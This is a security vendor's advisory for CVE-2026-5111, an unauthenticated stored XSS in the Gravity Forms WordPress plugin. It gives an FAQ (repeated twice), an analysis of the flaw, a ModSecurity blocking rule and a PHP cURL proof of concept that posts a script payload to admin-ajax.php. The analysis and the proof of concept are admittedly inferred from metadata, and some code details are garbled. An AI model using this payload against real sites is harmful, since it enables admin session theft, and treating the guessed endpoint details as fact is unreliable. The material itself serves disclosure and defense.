What is CVE-2026-5111?

CVE-2026-5111 is a high-severity vulnerability in the Gravity Forms plugin for WordPress, affecting versions up to and including 2.10.0. It allows unauthenticated stored cross-site scripting (XSS) through hidden product fields in repeater sections, enabling attackers to inject malicious scripts that execute when an administrator views entry details.

How does the vulnerability work?

The vulnerability arises from insufficient input validation and output escaping in the Hidden Product field’s product name. When an attacker submits a form with a malicious JavaScript payload in the hidden product name, it gets stored in the database and can execute when an administrator accesses the entry details.

Who is affected by this vulnerability?

Any WordPress site using the Gravity Forms plugin version 2.10.0 or earlier is potentially affected. Administrators should check their plugin version and review form submissions for any unauthorized entries.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the Gravity Forms plugin version in your WordPress admin panel. If it is 2.10.0 or earlier, your site is at risk. Additionally, review recent form submissions for any suspicious entries that may indicate exploitation.

What is the CVSS score and what does it mean?

The CVSS score for this vulnerability is 7.2, indicating a high severity level. This score reflects the potential for network-based exploitation without authentication, meaning attackers can exploit the vulnerability without needing valid user credentials.

What steps should I take to remediate this vulnerability?

To remediate CVE-2026-5111, update the Gravity Forms plugin to version 2.10.1 or later, which includes fixes for the vulnerability. Additionally, review and sanitize any existing entries in the database that may contain malicious scripts.

How does the proof of concept demonstrate the issue?

The proof of concept provided illustrates how an attacker can craft a form submission containing a malicious payload in the hidden product field. It simulates a POST request to the Gravity Forms AJAX endpoint, demonstrating that the payload can be stored and later executed by an administrator.

What are the potential risks of exploitation?

If exploited, this vulnerability could allow an attacker to execute arbitrary JavaScript in the context of an administrator’s session. This can lead to serious consequences, including theft of session cookies, unauthorized changes to site settings, or installation of backdoors.

What is stored cross-site scripting (XSS)?

Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web application, which are then stored on the server and served to users. In this case, the scripts execute in the browser of an administrator when they view the affected entry details.

How can I mitigate the risk if I cannot update immediately?

If immediate updates are not possible, consider disabling the use of hidden product fields in forms or restricting access to the entry details page to trusted administrators only. Regularly monitor form submissions for any suspicious activity.

What should I do if I suspect my site has been exploited?

If you suspect exploitation, immediately review your site for unauthorized changes, remove any suspicious entries, and change admin passwords. It is also advisable to conduct a full security audit and consider restoring from a clean backup.

Are there any additional resources for understanding this vulnerability?

For more information, refer to the official Gravity Forms documentation, security advisories, and the CVE database entry for CVE-2026-5111. Additionally, security forums and blogs may provide insights into best practices for mitigating such vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-5111: Gravity Forms <= 2.10.0 – Unauthenticated Stored Cross-Site Scripting via Hidden Product Field in Repeater (gravityforms)

CVE ID CVE-2026-5111

Plugin gravityforms

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 2.10.0

Patched Version —

Disclosed April 30, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5111 (metadata-based): This vulnerability allows unauthenticated stored cross-site scripting (XSS) in the Gravity Forms plugin for WordPress versions up to and including 2.10.0. The attack targets hidden product fields nested within repeater (repeating section) fields. An attacker can inject arbitrary JavaScript that executes when an administrator views submitted entry details. The CVSS score of 7.2 reflects network-based exploitation with no privileges required, but only partial impact to confidentiality and integrity due to the need for admin interaction.

Root Cause: Based on the CWE-79 classification and the vulnerability description, the root cause is insufficient input validation and output escaping of the product name value in hidden product fields when used inside repeater fields. The description indicates that the Hidden Product field’s validate() method only checks the quantity field, leaving the product name value unvalidated. This value is then output without escaping in the get_value_entry_detail() method. Atomic Edge analysis infers that the repeater subfields bypass normal state validation checks, allowing the product name field to accept arbitrary input. This is a confirmed vulnerability per the metadata, though no code diff is available to verify the exact implementation.

Exploitation: An unauthenticated attacker can submit a form containing a hidden product field inside a repeater. The attacker would craft a product name value containing a malicious JavaScript payload, such as alert(document.cookie). The form submission endpoint is typically /wp-admin/admin-ajax.php with an action parameter like gravityforms_submit_form (or similar). The attacker does not need authentication or a valid nonce because the vulnerability exists in unauthenticated form submission handling. The payload is stored in the database and triggers when an administrator views the entry details page (e.g., /wp-admin/admin.php?page=gf_entries&id=FORM_ID&view=entry&lid=ENTRY_ID).

Remediation: The fix in version 2.10.1 likely involves two changes: first, adding input validation to the Hidden Product field’s validate() method to also check the product name value; second, applying output escaping (e.g., using esc_html() or wp_kses()) when rendering the product name in get_value_entry_detail(). Atomic Edge analysis recommends that the plugin escape all output related to custom product fields and validate the product name to block HTML or script tags.

Impact: Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator’s session. This can lead to theft of admin session cookies, redirection to malicious sites, modification of plugin settings, creation of new admin accounts, or injection of backdoors in subsequent rendered pages. The stored XSS persists until the entry is deleted or the payload is manually removed.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-5111 (metadata-based)
# Blocks exploitation attempts targeting the product name parameter in hidden product fields within repeater subfields.
# This rule targets the AJAX submission endpoint with signs of XSS in the product name parameter.

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20265111,phase:2,deny,status:403,chain,msg:'CVE-2026-5111 - Gravity Forms Stored XSS via Hidden Product Field',severity:'CRITICAL',tag:'CVE-2026-5111'"
SecRule ARGS_POST:action "@streq gravityforms_submit_form" "chain"
SecRule ARGS_POST:/^input_d+_d+$/ "@rx <[^>]*script" "chain"
SecRule ARGS_POST:/.*product.*/ "@rx ." ""

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5111 - Gravity Forms <= 2.10.0 - Unauthenticated Stored XSS via Hidden Product Field in Repeater

// Configuration: Set the target URL of the WordPress site
$target_url = 'https://example.com';

// The AJAX endpoint for Gravity Forms submission
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// The action parameter used by Gravity Forms for form submissions
$action = 'gravityforms_submit_form';  // Common action name; may need adjustment if different

// XSS payload injected into the hidden product field's product name
$payload = '<script>alert(document.cookie);</script>';

// Construct the POST data mimicking a form submission with a repeater containing a hidden product field
$post_data = array(
    'action'         => $action,
    'gform_submit'   => '1',
    'gform_form_id'  => '1',  // Replace with a form ID that has a repeater with a hidden product field
    // Simulate the repeater subfield structure. The subfield IDs must match the form's field configuration.
    // 'input_1_1' is assumed to be the hidden product field's product name inside the repeater.
    'input_1_1'      => $payload,
    // The '_no_conflict_' parameter may be required to bypass Gravity Forms nonce checks
    'gform_field_values' => '',
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded',
    'User-Agent: Atomic-Edge-Research-PoC',
    'Referer: ' . $target_url . '/',  // Optional: mimics browser referrer
));

// Optional: disable SSL verification for testing with self-signed certificates
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output results for debugging
echo "HTTP Status: $http_coden";
echo "Response: $responsen";

echo "[+] Exploit submitted. The payload will execute when an admin views the entry details.n";
?>

Frequently Asked Questions

What is CVE-2026-5111?
Overview of the vulnerability
CVE-2026-5111 is a high-severity vulnerability in the Gravity Forms plugin for WordPress, affecting versions up to and including 2.10.0. It allows unauthenticated stored cross-site scripting (XSS) through hidden product fields in repeater sections, enabling attackers to inject malicious scripts that execute when an administrator views entry details.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input validation and output escaping in the Hidden Product field’s product name. When an attacker submits a form with a malicious JavaScript payload in the hidden product name, it gets stored in the database and can execute when an administrator accesses the entry details.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Gravity Forms plugin version 2.10.0 or earlier is potentially affected. Administrators should check their plugin version and review form submissions for any unauthorized entries.
How can I check if my site is vulnerable?
Steps to assess risk
To determine if your site is vulnerable, check the Gravity Forms plugin version in your WordPress admin panel. If it is 2.10.0 or earlier, your site is at risk. Additionally, review recent form submissions for any suspicious entries that may indicate exploitation.
What is the CVSS score and what does it mean?
Understanding severity ratings
The CVSS score for this vulnerability is 7.2, indicating a high severity level. This score reflects the potential for network-based exploitation without authentication, meaning attackers can exploit the vulnerability without needing valid user credentials.
What steps should I take to remediate this vulnerability?
Recommended actions
To remediate CVE-2026-5111, update the Gravity Forms plugin to version 2.10.1 or later, which includes fixes for the vulnerability. Additionally, review and sanitize any existing entries in the database that may contain malicious scripts.
How does the proof of concept demonstrate the issue?
Technical details of the exploit
The proof of concept provided illustrates how an attacker can craft a form submission containing a malicious payload in the hidden product field. It simulates a POST request to the Gravity Forms AJAX endpoint, demonstrating that the payload can be stored and later executed by an administrator.
What are the potential risks of exploitation?
Consequences of a successful attack
If exploited, this vulnerability could allow an attacker to execute arbitrary JavaScript in the context of an administrator’s session. This can lead to serious consequences, including theft of session cookies, unauthorized changes to site settings, or installation of backdoors.
What is stored cross-site scripting (XSS)?
Definition and implications
Stored cross-site scripting (XSS) occurs when an attacker is able to inject malicious scripts into a web application, which are then stored on the server and served to users. In this case, the scripts execute in the browser of an administrator when they view the affected entry details.
How can I mitigate the risk if I cannot update immediately?
Temporary protective measures
If immediate updates are not possible, consider disabling the use of hidden product fields in forms or restricting access to the entry details page to trusted administrators only. Regularly monitor form submissions for any suspicious activity.
What should I do if I suspect my site has been exploited?
Response to potential incidents
If you suspect exploitation, immediately review your site for unauthorized changes, remove any suspicious entries, and change admin passwords. It is also advisable to conduct a full security audit and consider restoring from a clean backup.
Are there any additional resources for understanding this vulnerability?
Further reading and references
For more information, refer to the official Gravity Forms documentation, security advisories, and the CVE database entry for CVE-2026-5111. Additionally, security forums and blogs may provide insights into best practices for mitigating such vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations